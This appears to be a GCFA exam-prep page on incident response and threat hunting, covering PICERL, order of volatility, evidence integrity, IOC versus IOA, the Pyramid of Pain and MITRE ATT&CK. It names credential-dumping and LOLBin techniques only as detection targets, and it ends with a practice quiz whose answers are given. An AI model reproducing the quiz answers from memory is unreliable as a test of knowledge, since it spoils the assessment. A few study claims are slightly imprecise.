Incident Response & Threat Hunting

Effective DFIR begins with a structured methodology and the discipline to preserve evidence before acting. Every decision in the field has downstream forensic consequences.

    GCFA Mindset: Digital forensics is evidence-driven. Before you act, ask: will this action destroy evidence? Before you analyze, ask: is this evidence forensically sound? The order of volatility, chain of custody, and write-blocked imaging aren't procedural checkboxes — they're the foundation that makes everything else legally and analytically defensible.
  

IR Lifecycle — PICERL (6 Phases)

Preparation

Before the incident — build the capability to respond

Develop IR policies, procedures, and playbooks. Deploy logging infrastructure (SIEM, EDR, network monitoring). Build and train the IR team. Establish legal authorization, communication plans, and forensic toolkit readiness. Conduct tabletop exercises.

Key artifacts: IR plan, asset inventory, forensic toolkit inventory, contact lists, legal retainer

Identification

Determine IF an incident has occurred and its scope

Detect the event through alerts, user reports, or threat intelligence. Analyze indicators to determine whether this is a genuine security incident vs. a false positive. Define initial scope: which systems, which accounts, what timeframe? Assign incident severity.

Key artifacts: Alert logs, SIEM queries, initial IOC list, incident ticket, severity classification

Containment

Limit damage and prevent further spread — preserve evidence

Short-term containment: isolate affected systems from the network while preserving volatile evidence (memory, running processes). Long-term containment: implement network segmentation, disable compromised credentials, block C2 IPs. Critical tension: act fast vs. preserve evidence.

Key artifacts: Memory images (collected BEFORE isolation where possible), network isolation records, firewall block rules

Eradication

Remove the threat actor and all persistence mechanisms

Identify and remove malware, backdoors, unauthorized accounts, and all attacker persistence (Run keys, scheduled tasks, WMI subscriptions, services). Patch the vulnerability that enabled initial access. Do NOT eradicate before thorough forensic analysis — premature cleanup destroys evidence.

Key artifacts: Malware samples, persistence mechanism inventory, patch records, credential reset documentation

Recovery

Restore systems to normal, verified operation

Restore from clean backups, rebuild affected systems, or validate cleanliness of systems remaining in production. Implement enhanced monitoring for the recovered environment to detect any re-compromise. Phased restoration — most critical business systems first.

Key artifacts: Backup integrity verification, monitoring coverage confirmation, restoration checklist, business sign-off

Lessons Learned

Improve future response capability from every incident

Post-incident review (PIR) conducted within 2 weeks. Document root cause, timeline, what worked, what failed, and improvement actions. Update playbooks, detection rules, and training. Calculate cost and impact. Report to leadership. The most underutilized phase.

Key artifacts: Post-incident report, updated IR playbooks, new detection rules, executive summary, cost analysis

Order of Volatility — Evidence Collection Priority

Collect the most volatile evidence first — it will disappear when the system is powered off or rebooted. Per RFC 3227, volatility determines collection sequence.

CPU Registers & Cache

Processor state; lost in microseconds

Most Volatile

RAM (Physical Memory)

Running processes, network connections, encryption keys, malware artifacts

Critical

Virtual Memory / Swap / Page File

Overflow from RAM; may contain process fragments and sensitive data

High

Network State

Active connections, routing tables, ARP cache, listening ports

High

Running Processes & Services

Process list, open file handles, loaded DLLs

Medium

Disk (Non-Volatile Storage)

File system, registry, event logs, MFT — survives power cycle

Medium

Remote Logging & Monitoring Data

SIEM logs, centralized syslog — may be overwritten by retention policy

Lower

Archival Media & Backups

Tape backups, cold storage — least volatile, longest retention

Least Volatile

IOC vs. IOA — Quick Reference

🔵 Indicator of Compromise (IOC)

🔴 Indicator of Attack (IOA)

Definition

Artifact of a past or ongoing compromise — evidence that something bad happened

Behavioral evidence of an attacker's actions in progress — what they are DOING

Examples

Malware hash, known malicious IP, domain name, file path, registry key

Unusual process spawning cmd.exe, lateral movement via WMI, credential dumping behavior

Detection timing

Reactive — usually detected after the fact; requires known signature

Proactive — can detect novel attacks even without prior knowledge of specific tools

Evasion by attacker

Easy — recompile malware, change IP, rotate domain (trivial to change)

Hard — TTPs represent attacker methodology; changing TTPs requires retooling entire approach

Best for

Threat intelligence sharing, blocklists, known-bad signatures

Threat hunting, behavioral detection, advanced adversary detection

IR Methodology & Evidence Integrity

Sound incident response depends on forensically sound evidence collection. Every action in the field must consider its impact on evidence integrity and legal admissibility.

    The Golden Rule: Never work on original evidence. Always acquire a forensic image, verify hash integrity, and work from the copy. If you modify the original — even accidentally — the evidence may be inadmissible and the investigation compromised.
  

Evidence Integrity — Core Requirements

🔒

Write Blocker

Hardware or software device that intercepts all write commands to the evidence drive, allowing data to be read without any modification. Hardware write blockers are preferred over software — they operate at a lower level and are more reliable. Required for disk imaging of physical drives.

#️⃣

Cryptographic Hashing (MD5/SHA-256)

Generate a hash of the evidence BEFORE and AFTER imaging. If hashes match, evidence is forensically intact. SHA-256 is preferred over MD5 (MD5 is still widely used for forensics but has known collision weaknesses). Record hash values in the chain of custody documentation.

📋

Chain of Custody

Documented, unbroken record of who collected, handled, transferred, analyzed, and stored each piece of evidence. Every transfer must be signed. Gaps in chain of custody can render evidence inadmissible in legal proceedings. Use evidence tags, tamper-evident bags, and a formal custody log.

🖼️

Forensic Imaging (Bit-for-Bit Copy)

Create a complete sector-by-sector copy of the storage media — including deleted files, slack space, and unallocated space. Common formats: E01 (EnCase), DD/raw, AFF4. Standard tools: FTK Imager, dd, dcfldd. ALWAYS work from the forensic image, never the original.

📦

Evidence Preservation & Storage

Store evidence in tamper-evident packaging with evidence tags. Maintain appropriate environmental conditions (antistatic bags for drives). Restrict access to authorized personnel only. Document storage location in chain of custody. Follow legal hold procedures for litigation.

Triage Acquisition vs. Full Forensic Acquisition

Dimension	Triage Acquisition	Full Forensic Acquisition
Speed	Fast — targeted collection of key artifacts only	Slow — complete bit-for-bit disk image (hours for large drives)
Completeness	Partial — may miss artifacts not in targeted locations	Complete — captures everything including deleted files, slack space
System state	Can be performed on live running system (preserves volatile data)	Usually requires offline/powered-off system for disk imaging
Legal weight	Lower — may not meet evidentiary standards for court	Higher — full chain of custody, hash verification, forensically sound
Best for	Initial scoping, large enterprise with many systems, IR triage	Deep investigation, litigation, regulatory investigations
Tools	Kansa, CrowdStrike, Velociraptor, KAPE	FTK Imager, EnCase, dd, dcfldd, Autopsy

Live Memory Acquisition — Key Considerations

RAM must be acquired BEFORE system shutdown or isolation where operationally possible. It contains running processes, network connections, decrypted malware, and encryption keys — none of which survive a power cycle.

Tool	Platform	Notes
WinPmem	Windows	Open source; produces raw or AFF4 memory images; requires admin rights
Magnet RAM Capture	Windows	Free; GUI-based; good for first responders; outputs raw memory image
FTK Imager	Windows	Also captures memory (in addition to disk); widely accepted in legal proceedings
LiME (Linux Memory Extractor)	Linux	Loadable kernel module; only method that fully captures kernel memory on Linux
OSXPmem / avml	macOS / Linux	avml is Microsoft's open-source Linux memory acquisition tool

Legal Considerations in IR

Consideration	Details
Authorization	Ensure written authorization from system/data owner before collecting evidence. Corporate IR teams typically operate under employment agreements; law enforcement requires warrants or consent.
Jurisdiction	Cross-border incidents (cloud, remote employees) may trigger multiple legal frameworks (GDPR, CFAA, local law). Engage legal counsel early for multi-jurisdictional incidents.
Privacy Laws	Employee monitoring, personal data collection, and cross-border data transfer all carry legal constraints. GDPR requires data minimization even in IR contexts.
Evidence Admissibility	For criminal prosecution: chain of custody, forensically sound collection, and expert witness qualification. Corporate investigations have lower evidentiary bars but should still follow best practices.
Notification Obligations	Regulatory breach notification timelines vary: GDPR = 72 hours; HIPAA = 60 days; SEC = 4 business days (material incidents). Engage legal before notifying regulators.

Threat Hunting

Threat hunting is a proactive, hypothesis-driven search for threats that have evaded automated detection. Unlike alert-driven IR, hunting assumes the adversary is already inside.

    Hunting Assumption: Threat hunters operate under the assumption of breach — the adversary is already present and has evaded existing controls. Hunting is not reactive to alerts; it is a proactive, human-driven analytical process that seeks unknown threats by examining behaviors, anomalies, and TTPs.
  

Pyramid of Pain (David Bianco, 2013)

Ranks threat indicators by how much pain it causes an attacker when defenders detect and block them. Higher = harder for the attacker to change = more valuable detection.

TTPs — Tactics, Techniques & Procedures

Attacker methodology; requires complete retooling to change

Tough!

Tools — Malware, attack frameworks (Cobalt Strike, Mimikatz)

Takes time and money to develop or replace tooling

Challenging

Network / Host Artifacts — Registry keys, mutexes, file paths

Requires modifying operational tradecraft; annoying to change

Annoying

Domain Names — C2 domains, phishing domains

Can rotate but costs time and money (registration, infra)

Simple

IP Addresses — C2 IPs, proxy nodes

Easy to rotate through bulletproof hosting or VPS providers

Easy

Hash Values — MD5/SHA-256 of malware files

Trivial — recompile or change one byte; hash changes immediately

Trivial

Hypothesis-Driven Hunting Workflow

Form Hypothesis

Start with a specific, testable hypothesis: "An attacker may have used WMI for persistence on workstations in Finance." Hypotheses driven by threat intel, ATT&CK techniques, or prior incidents.

Identify Data Sources

Determine which logs and artifacts would contain evidence. WMI persistence → WMI repository, Event ID 5857/5858, Sysmon Event ID 19/20/21, PowerShell logs, registry artifacts.

Collect & Query Data

Extract relevant data using SIEM queries, EDR telemetry, or forensic tools. Apply filters to reduce noise while preserving true positives. Analyze patterns across the target population.

Analyze & Investigate

Manually analyze results for anomalies. Correlate across data sources (process creation + network + registry). Distinguish malicious activity from legitimate admin tools (LOLBins).

Respond or Tune

If threat found: escalate to IR. If not found: the investigation produces new knowledge — document findings, update threat models, and create detection rules to automate future hunting.

Hunting Maturity Model (HMM — Sqrrl, 2015)

Level 0 · Initial

Alert-Dependent

Organization relies entirely on automated alerts. No proactive hunting. Detection capability limited to known signatures. The adversary operates freely between alerts.

Level 1 · Minimal

IOC-Driven Hunting

Threat intel feeds drive ad-hoc searches for known IOCs (hashes, IPs, domains). Reactive, not proactive. Limited to what is already known — misses novel TTPs.

Level 2 · Procedural

Hypothesis-Driven

Analysts develop hunting hypotheses based on threat intelligence and ATT&CK. Structured hunts follow documented procedures. Detection logic starts to be formalized.

Level 3 · Innovative

Analytics & ML

Custom analytics, machine learning, and behavioral baselines enable detection of unknown unknowns. Hunting output drives continuous improvement of automated detection. The gold standard.

Key Threat Hunting Data Sources

Data Source	What to Hunt	Key Evidence
Windows Event Logs	Logon anomalies, privilege escalation, service creation	Event IDs 4624/4625/4648 (logon), 4688 (process), 7045 (service install), 4698 (scheduled task)
Sysmon Logs	Process creation, network connections, file writes, registry changes	Event IDs 1 (process), 3 (network), 11 (file create), 13 (registry), 19-21 (WMI)
PowerShell Logs	Encoded commands, download cradles, AMSI bypass attempts	Module logging (4103), Script block logging (4104), Transcription logs
Network Traffic / DNS	C2 beaconing, DNS tunneling, lateral movement, data staging	Unusual outbound connections, high-entropy DNS queries, periodic beaconing patterns
EDR Telemetry	Process injection, credential dumping, LOLBin abuse	Parent-child process anomalies, lsass.exe access, unusual DLL loads
Proxy / Web Gateway	C2 over HTTP/HTTPS, staged payload downloads	User agent anomalies, low-reputation domains, unusual POST-heavy sessions

MITRE ATT&CK Framework

ATT&CK (Adversarial Tactics, Techniques & Common Knowledge) is a globally accessible knowledge base of adversary behaviors based on real-world observations — the essential reference for DFIR practitioners.

    ATT&CK Hierarchy: Tactics = the adversary's goal (the "why" — 14 enterprise tactics). Techniques = the method used to achieve the tactic (the "how" — 200+ techniques). Sub-techniques = specific implementation of a technique. Procedures = the exact implementation a named threat actor uses (the "who and what specifically").
  

14 Enterprise ATT&CK Tactics — In Attack Sequence Order

Tactic 1

Reconnaissance

TA0043

Gather info before the attack: OSINT, scanning, phishing for intel

Tactic 2

Resource Development

TA0042

Build capabilities: buy domains, stage malware, compromise infra

Tactic 3

Initial Access

TA0001

Get a foothold: phishing, exploit public-facing app, supply chain

Tactic 4

Execution

TA0002

Run malicious code: PowerShell, WMI, scheduled tasks, cmd.exe

Tactic 5

Persistence

TA0003

Maintain foothold: Run keys, services, WMI subscriptions, scheduled tasks

Tactic 6

Privilege Escalation

TA0004

Gain higher permissions: token impersonation, UAC bypass, exploit

Tactic 7

Defense Evasion

TA0005

Avoid detection: obfuscation, LOLBins, log clearing, timestomping

Tactic 8

Credential Access

TA0006

Steal credentials: Mimikatz, LSASS dump, credential harvesting

Tactic 9

Discovery

TA0007

Learn the environment: network scan, account enumeration, file discovery

Tactic 10

Lateral Movement

TA0008

Pivot to other systems: PsExec, WMI, pass-the-hash, RDP

Tactic 11

Collection

TA0009

Gather target data: keylogging, screen capture, clipboard, file staging

Tactic 12

Command & Control

TA0011

Communicate with attacker: C2 beaconing over HTTP/DNS, tunneling

Tactic 13

Exfiltration

TA0010

Steal data: exfil over C2, cloud storage, encrypted channels

Tactic 14

Impact

TA0040

Final objective: ransomware, data destruction, defacement, wiper

High-Frequency GCFA Techniques by Tactic

Tactic	Key Technique	ATT&CK ID	Forensic Evidence
Initial Access	Phishing: Spearphishing Attachment	T1566.001	Email headers, .lnk files, macro-enabled Office docs, browser downloads
Execution	PowerShell	T1059.001	Event ID 4103/4104, ConsoleHost_history.txt, Prefetch for powershell.exe
Persistence	Registry Run Keys / Startup Folder	T1547.001	HKCU/HKLM Run keys in registry, Startup folder contents
Persistence	Scheduled Task/Job	T1053.005	Event ID 4698/4702, C:\Windows\System32\Tasks\, XML task files
Defense Evasion	Indicator Removal: Clear Windows Event Logs	T1070.001	Event ID 1102 (Security log cleared), 104 (System log cleared)
Credential Access	OS Credential Dumping: LSASS Memory	T1003.001	Sysmon Event ID 10 (lsass.exe access), minidump files, Mimikatz artifacts
Lateral Movement	Remote Services: SMB/Windows Admin Shares	T1021.002	Event ID 4624 Type 3 (network logon), net use commands, named pipes
Command & Control	Application Layer Protocol: Web Protocols	T1071.001	Unusual outbound HTTP/HTTPS, periodic beaconing, proxy logs, DNS queries

ATT&CK Applied to DFIR Investigations

DFIR Use Case	How ATT&CK Helps
Threat Hunting	Use ATT&CK techniques as hunting hypotheses: "Hunt for T1055 Process Injection across all endpoints"
Incident Scoping	Map observed artifacts to ATT&CK techniques to build a complete picture of attacker activity across the kill chain
Gap Analysis	Compare ATT&CK techniques used by relevant threat actors against your detection coverage — find blind spots
Threat Intelligence	ATT&CK groups (threat actors) document which TTPs each named group uses — enables predictive hunting
IR Report Writing	Map every observed attacker action to an ATT&CK ID for standardized, communicable incident reporting
Detection Engineering	Build SIEM rules and EDR detections targeted at specific ATT&CK technique artifacts and behaviors

Practice Quiz — Incident Response & Threat Hunting

10 questions covering PICERL, order of volatility, evidence integrity, IOC vs. IOA, Pyramid of Pain, and MITRE ATT&CK. Select an answer then click Submit.

Question 1 of 10

What is the correct sequence of the six phases in the PICERL incident response lifecycle?

A Identification → Preparation → Containment → Eradication → Recovery → Lessons Learned

B Preparation → Identification → Containment → Eradication → Recovery → Lessons Learned

C Preparation → Containment → Identification → Eradication → Recovery → Lessons Learned

D Identification → Containment → Preparation → Recovery → Eradication → Lessons Learned

The PICERL sequence is: Preparation (before the incident — build capability), Identification (determine if an incident occurred and scope), Containment (limit spread, preserve evidence), Eradication (remove threat actor and persistence), Recovery (restore normal operations), Lessons Learned (post-incident review, improve capability). Preparation must come first — you cannot respond effectively without prior planning.

Question 2 of 10

Per the order of volatility, which evidence source should be collected FIRST during an incident response on a live system?

A Hard disk forensic image using FTK Imager

B Windows Event Logs from the System and Security channels

C RAM (physical memory) acquisition using a memory capture tool

D Network packet capture using Wireshark on the affected segment

RAM is the most critical volatile evidence — it contains running processes, network connections, decrypted malware, encryption keys, and attacker tooling that exist nowhere else. It is completely lost on shutdown or reboot. Per RFC 3227's order of volatility: CPU registers → RAM → Swap/Page file → Network state → Running processes → Disk. Disk evidence (Event Logs, forensic image) survives a power cycle and can be collected later. Memory cannot.

Question 3 of 10

What distinguishes an Indicator of Attack (IOA) from an Indicator of Compromise (IOC)?

A IOAs are found in memory; IOCs are found exclusively on disk

B IOAs focus on attacker behavior and intent; IOCs are artifacts of past compromise

C IOCs are more valuable for detecting advanced threats than IOAs

D IOAs are only used by government threat intelligence teams

IOCs (Indicators of Compromise) are artifacts of past compromise — hashes, IPs, domains, file paths. They are reactive and easily evaded (attackers can recompile malware to change the hash in seconds). IOAs (Indicators of Attack) focus on attacker behavior — what they are doing, not what tools they used. IOAs detect intent: unusual process spawning, credential dumping behavior, LOLBin abuse. IOAs are far harder to evade because changing TTPs requires the attacker to retool their entire methodology.

Question 4 of 10

In the MITRE ATT&CK framework, which component represents the adversary's high-level objective — the tactical goal that explains WHY a technique is used?

A Technique — the specific method used to achieve a goal

B Sub-technique — a more granular implementation of a technique

C Tactic — the adversary's tactical goal explaining why a technique is employed

D Procedure — the specific implementation by a named threat actor group

The ATT&CK hierarchy: Tactic = the "why" (adversary's goal, e.g., Persistence); Technique = the "how" (method used, e.g., Registry Run Keys); Sub-technique = more specific implementation (e.g., HKCU Run Key specifically); Procedure = named actor's exact implementation (e.g., APT29 uses HKCU Software\Microsoft\Windows\CurrentVersion\Run to execute a specific backdoor). Tactics answer "why"; techniques answer "how"; procedures answer "who does what exactly."

Question 5 of 10

An IR responder discovers an active intrusion on a Windows workstation. Which action should be performed FIRST to preserve the most valuable volatile evidence?

A Power off the workstation immediately to freeze its current state

B Disconnect the workstation from the network to prevent further attacker access

C Acquire a memory image of the running system before any other action

D Run antivirus to identify and quarantine the malware

Acquiring RAM first is the correct priority — it is the most volatile evidence and is lost the moment the system is powered off or rebooted. Memory contains running malware (which may not be on disk at all — fileless malware), active network connections to C2 servers, decryption keys, credentials in plaintext, and attacker tooling. Powering off destroys all of this. Network isolation is next (prevent further spread), but only after memory is captured. Running AV modifies evidence and should never be done before forensic acquisition.

Question 6 of 10

Chain of custody documentation is PRIMARILY maintained to ensure:

A The incident response process is completed within the agreed SLA timeframe

B Digital evidence remains legally admissible and its integrity can be demonstrated in court

C The IR team can prioritize which systems to analyze first based on business value

D Executive leadership can track the cost of the incident for insurance reimbursement

Chain of custody is an unbroken, documented record of who collected, handled, transferred, and analyzed each piece of evidence. Its primary purpose is legal admissibility — demonstrating that evidence was not tampered with between collection and presentation in court. Breaks in chain of custody (unaccounted time, unsigned transfers, unlocked storage) allow defense attorneys to challenge evidence integrity. Even in corporate investigations without litigation intent, chain of custody is best practice — the nature of incidents can change rapidly.

Question 7 of 10

A threat hunter develops the hypothesis: "An attacker may have used WMI event subscriptions for persistence on endpoints." This hunting approach is BEST classified as:

A IOC-driven hunting — searching for specific known-bad file hashes or IP addresses

B Intel-driven hunting — using external threat intelligence reports as the primary driver

C TTP-based hunting — searching for attacker behaviors and techniques regardless of specific tooling used

D Anomaly-based hunting — searching for statistical deviations from behavioral baselines

TTP-based hunting focuses on attacker behaviors — how they operate — rather than known artifacts (IOC-driven) or specific intelligence reports (intel-driven). "WMI event subscriptions for persistence" is T1546.003 in ATT&CK — a specific technique that represents attacker behavior. TTP-based hunting is powerful because it detects threats even when attackers change their tools, IPs, or domains. It sits near the top of the Pyramid of Pain — TTPs are what cause maximum pain when defenders can detect them.

Question 8 of 10

What is the PRIMARY purpose of using a hardware write blocker during forensic disk acquisition?

A To accelerate the imaging process by optimizing read throughput from the evidence drive

B To compress the forensic image automatically during the acquisition process

C To prevent any accidental or automatic modification to the original evidence drive

D To authenticate the forensic examiner's identity before granting access to the drive

A write blocker intercepts all write commands at the hardware level, allowing the forensic examiner to read data from the evidence drive without any possibility of modifying it — even accidentally (e.g., Windows auto-updating timestamps when it mounts a drive). Modifying original evidence violates forensic integrity and may make evidence inadmissible. Hardware write blockers are preferred over software write blockers because they operate at a lower, more reliable level. After imaging, hash values confirm the image matches the original.

Question 9 of 10

Which MITRE ATT&CK tactic describes the adversary's efforts to avoid detection throughout the intrusion — including log deletion, obfuscation, and timestomping?

A Initial Access — techniques to gain entry into the target network

B Persistence — techniques to maintain a foothold after initial access

C Privilege Escalation — techniques to gain higher-level permissions

D Defense Evasion — techniques to avoid detection by security tools and analysts

Defense Evasion (TA0005) encompasses all techniques adversaries use to avoid detection: log clearing (T1070.001), timestomping (T1070.006), indicator removal, obfuscation/encoding, masquerading as legitimate processes, disabling security tools, and LOLBin (Living-off-the-Land Binary) abuse to blend into normal activity. It is the most populated ATT&CK tactic — because adversaries work hard to avoid detection throughout the entire intrusion. Forensically, evidence of defense evasion (e.g., Event ID 1102 — Security log cleared) is itself a significant finding.

Question 10 of 10

According to the Pyramid of Pain (David Bianco), which indicator type causes the MOST pain for an attacker when detected and blocked by defenders?

A Hash values — MD5/SHA-256 of malware files

B TTPs — Tactics, Techniques, and Procedures

C IP addresses — known C2 server addresses

D Domain names — C2 or phishing domains

TTPs (Tactics, Techniques, and Procedures) sit at the top of the Pyramid of Pain — they are the hardest for attackers to change. TTPs represent the attacker's fundamental methodology — how they operate, think, and execute. Changing TTPs requires a complete retooling of the attack approach, significant time, and money. In contrast, a file hash can be changed in seconds (recompile with one character difference), IPs and domains can be rotated in hours. This is why TTP-based detection (behavioral detection) is the gold standard — it remains effective regardless of tooling changes.

Practice Score — Keep studying with FlashGenius!

Memory Hooks

High-yield mnemonics and patterns to lock in IR & Threat Hunting for the GCFA.

🚨

PICERL — IR Lifecycle Order

Preparation (build before) → Identification (detect & scope) → Containment (limit spread, preserve evidence) → Eradication (remove threat) → Recovery (restore operations) → Lessons Learned (improve). Critical: never skip to Eradication before full forensic analysis — you'll destroy evidence.

Mnemonic: "Please Identify Criminals Even Remotely Located" — or just remember PICERL as one word. The order matters — E before R, always.

⚡

Order of Volatility — Collect First to Last

RAM first (lost on shutdown) → Swap/Page file → Network state → Running processes → Disk (survives power cycle) → Remote logs → Archives. The rule: if it disappears when you pull the power cable, collect it FIRST. Memory is everything — fileless malware exists ONLY in RAM.

Mnemonic: "RAM Never Persists — Disk Remains Later Always" — RAM, Network, Processes, Disk, Remote Logs, Archives

🔺

Pyramid of Pain — Bottom to Top

Hash (trivial) → IP (easy) → Domain (simple) → Network/Host artifacts (annoying) → Tools (challenging) → TTPs (tough!). Higher = harder for attacker to change = more valuable detection. Hash-based detection = playing whack-a-mole. TTP detection = catching the attacker regardless of what tools they use.

Mnemonic: "Hackers In Dark Nights Take Trophies" — Hash, IP, Domain, Network artifacts, Tools, TTPs (bottom to top)

🎯

IOC vs. IOA — The Key Difference

IOC = artifact (what was left behind — past tense). IOA = behavior (what the attacker IS doing — present tense). IOCs are reactive and easily evaded; IOAs detect intent regardless of tooling. The exam tests this distinction constantly: "attacker changes hash" → IOC useless, IOA still works.

Mnemonic: "IOC = what they LEFT, IOA = what they DO" — Compromise = artifact; Attack = action.

🗺️

14 ATT&CK Tactics — In Order

Recon → Resource Dev → Initial Access → Execution → Persistence → Privilege Esc → Defense Evasion → Credential Access → Discovery → Lateral Movement → Collection → C2 → Exfiltration → Impact. The first two (Recon, Resource Dev) happen before the attack. Defense Evasion is most populated. Impact is the final goal.

Mnemonic: "Really Resourceful Initial Encounters Prompt Pretty Determined Criminals Doing Lateral Collection C2 Exfil Impact" — first letter of each tactic

🔬

Evidence Integrity Triad

Three non-negotiables for forensically sound evidence: Write blocker (prevent modification), Hash verification (prove no change — before AND after imaging), Chain of custody (document all handling). Miss any one → evidence challenged in court. Work from image, never original.

Mnemonic: "Write, Hash, Chain" — three words, three requirements. Add: "Never touch the original" as a fourth commandment.

High-Yield GCFA Facts — IR & Threat Hunting

Fact	Answer
PICERL — full expansion in order	Preparation, Identification, Containment, Eradication, Recovery, Lessons Learned
Most volatile evidence source (collect first)	RAM (physical memory) — lost on shutdown
Event ID for Security Log cleared (defense evasion)	Event ID 1102 (Security log cleared); Event ID 104 (System log cleared)
ATT&CK tactic with the most techniques	Defense Evasion (TA0005)
Pyramid of Pain — highest level indicator	TTPs — Tactics, Techniques & Procedures (hardest for attacker to change)
Pyramid of Pain — lowest level indicator	Hash Values — trivial to change by recompiling malware
ATT&CK tactic covering LSASS dumping with Mimikatz	Credential Access (TA0006) — T1003.001
Purpose of a write blocker	Prevents any write commands to original evidence — allows read without modification
Hunting maturity level that uses hypothesis-driven TTPs	Level 2 — Procedural (uses documented hunting procedures based on ATT&CK)
RFC 3227	Guidelines for Evidence Collection and Archiving — defines order of volatility

Flashcards & Study Advisor

Click any card to flip it. Use the Study Advisor for targeted guidance by topic area.

Framework

What does PICERL stand for and what is the critical rule about Eradication?

Tap to reveal →

Answer

Preparation, Identification, Containment, Eradication, Recovery, Lessons Learned. Critical rule: never eradicate BEFORE thorough forensic analysis — premature cleanup destroys evidence needed to understand the full scope of the intrusion.

Concept

What is the order of volatility and why does it matter?

Tap to reveal →

Answer

Evidence collection priority from most to least volatile: RAM → Swap → Network state → Running processes → Disk → Remote logs → Archives. It matters because volatile evidence disappears when power is removed — lose RAM and you lose fileless malware, decryption keys, and live attacker connections forever.

Distinction

What is the difference between an IOC and an IOA, and which is harder to evade?

Tap to reveal →

Answer

IOC = artifact of past compromise (hash, IP, domain) — reactive, easily evaded by changing the artifact. IOA = behavioral evidence of attacker actions in progress (credential dumping, LOLBin abuse) — harder to evade because changing TTPs requires retooling the entire attack methodology.

Framework

What is the Pyramid of Pain and what sits at its top?

Tap to reveal →

Answer

David Bianco's model ranking indicators by pain caused to attackers when detected. Bottom (trivial): Hashes. Then: IPs, Domains, Network/Host Artifacts, Tools. Top (tough!): TTPs. Higher on the pyramid = harder for the attacker to change = more valuable for defenders to detect.

Framework

Name the 14 MITRE ATT&CK tactics in attack sequence order.

Tap to reveal →

Answer

Reconnaissance → Resource Development → Initial Access → Execution → Persistence → Privilege Escalation → Defense Evasion → Credential Access → Discovery → Lateral Movement → Collection → Command & Control → Exfiltration → Impact. (14 total; first 2 are pre-attack.)

Concept

What is threat hunting and what is its core assumption?

Tap to reveal →

Answer

Threat hunting: proactive, hypothesis-driven search for threats that have evaded automated detection. Core assumption: assume breach — the adversary is already inside and operating undetected. Unlike alert-driven IR, hunting does not wait for alerts — it actively seeks threats through behavioral analysis.

Evidence

What are the three non-negotiable requirements for forensically sound evidence?

Tap to reveal →

Answer

1. Write blocker — prevents modification of original evidence during acquisition. 2. Hash verification — SHA-256 hash before and after imaging proves no change occurred. 3. Chain of custody — unbroken documented record of all handling. All three required for legal admissibility.

ATT&CK

What ATT&CK tactic is most heavily populated, and what Windows Event IDs indicate an attacker attempted it?

Tap to reveal →

Answer

Defense Evasion (TA0005) — the most populated ATT&CK tactic. Key Event IDs: 1102 (Security log cleared) and 104 (System log cleared) — direct evidence of attacker log tampering. Also: timestomping (T1070.006), masquerading, obfuscation, and LOLBin abuse all fall under Defense Evasion.

Ready to pass the GCFA?

Reinforce Incident Response & Threat Hunting with full-length practice tests on FlashGenius.

Unlock Full Practice Tests on FlashGenius →

📌 Exam Strategy

⚠️ Common Mistakes

⚡ Quick Review

🔬 Deep Dive

🎯 Practice Tips

Exam Strategy — IR & Threat Hunting

PICERL sequence questions: The order is fixed. Any question about "what comes first" — Preparation is always before the incident. Containment preserves evidence while limiting spread; Eradication removes the threat only after analysis is complete.
Order of volatility: RAM = always first. Disk = survives power cycle. If a question asks "what to collect before shutdown" → memory. "What survives a reboot" → disk artifacts (Event Logs, registry, MFT).
IOC vs IOA: The exam loves this distinction. Key tell: if it's a hash/IP/domain → IOC. If it's behavior (credential dumping, LOLBin abuse, unusual process spawning) → IOA. IOAs survive attacker tooling changes; IOCs do not.
Pyramid of Pain top = TTPs: Any question about "what is hardest for attackers to change" or "what gives defenders the most advantage" → TTPs. The bottom of the pyramid (hashes) are trivially evaded.
ATT&CK tactic ID questions: Defense Evasion = TA0005. Initial Access = TA0001. Credential Access = TA0006. Know the most tested: Persistence (TA0003), Defense Evasion (TA0005), Lateral Movement (TA0008).

Common Mistakes to Avoid

Powering off before memory capture: The most common field mistake. Never pull the plug before acquiring RAM — fileless malware, encryption keys, and C2 connections only exist in memory.
Running AV on live evidence: AV modifies files (quarantines, deletes), changes timestamps, and destroys forensic artifacts. Never run AV before forensic acquisition is complete.
Confusing IOC and IOA: "Attacker changes the malware hash" → the IOC is now useless. The IOA (behavior) remains valid. The exam will present scenarios where hash-based detection fails and test whether you know why.
Eradication before analysis: Premature eradication is the #1 mistake that causes re-compromise. If you clean up before finding all persistence mechanisms, the attacker is back in 24 hours.
Treating all 14 ATT&CK tactics as sequential: They are not strictly linear — adversaries often run multiple tactics simultaneously (Persistence + Defense Evasion happening at the same time). The order shown is a general progression, not a strict sequence.

Quick Review — Key Facts

PICERL: Preparation → Identification → Containment → Eradication → Recovery → Lessons Learned
Order of volatility (top 4): RAM → Swap/Page file → Network state → Running processes
Evidence integrity triad: Write blocker + Hash verification + Chain of custody
IOC: artifact (hash/IP/domain) — reactive, easily evaded
IOA: behavior — proactive, survives tool changes
Pyramid top: TTPs. Pyramid bottom: Hash values
14 ATT&CK tactics: Recon → Resource Dev → Initial Access → Execution → Persistence → Privilege Esc → Defense Evasion → Credential Access → Discovery → Lateral Movement → Collection → C2 → Exfiltration → Impact
Log cleared Event IDs: 1102 (Security), 104 (System)

Deep Dive — Advanced Concepts

Fileless malware and memory forensics: Modern APTs increasingly use fileless techniques — malware that runs entirely in memory with no disk artifact. The only way to detect it is RAM acquisition and memory forensics (Volatility). Event Log analysis and disk forensics alone will miss it entirely.
GDPR and IR tension: GDPR requires data minimization even during IR — you cannot collect employee personal data without legal basis. Many organizations use a legitimate interest basis for IR investigations but must document this. Cross-border evidence collection (EU data on US servers) triggers GDPR constraints regardless of where the investigation originates.
ATT&CK Navigator for gap analysis: The ATT&CK Navigator tool lets you layer your organization's detection coverage over ATT&CK techniques. Gaps in coverage reveal where a motivated adversary could operate undetected — directly informing threat hunting priorities.
Living-off-the-Land (LOLBins): Adversaries abuse legitimate Windows binaries (certutil.exe, mshta.exe, regsvr32.exe, wmic.exe) to execute malicious code. These bypass hash-based AV detection because the tools themselves are legitimate. Detection requires behavioral analysis — parent-child process anomalies, command-line argument inspection, and destination analysis. This is IOA territory.
Hunting at scale: Enterprise hunting requires centralizing telemetry across thousands of endpoints. Velociraptor is a GCFA-relevant tool for large-scale forensic artifact collection and hunting — it can collect specific artifacts (prefetch, event logs, registry) from thousands of endpoints simultaneously without full disk imaging.

Practice Tips

Map every scenario to PICERL: For any IR scenario question, identify which phase you're in first — this immediately narrows the correct action. "Active intrusion discovered" → Containment phase. "Malware removed, monitoring for re-infection" → Recovery phase.
Practice the Pyramid from memory: Draw the 6 levels without looking. Then for each level, write one concrete example. This builds the pattern recognition needed for scenario-based questions.
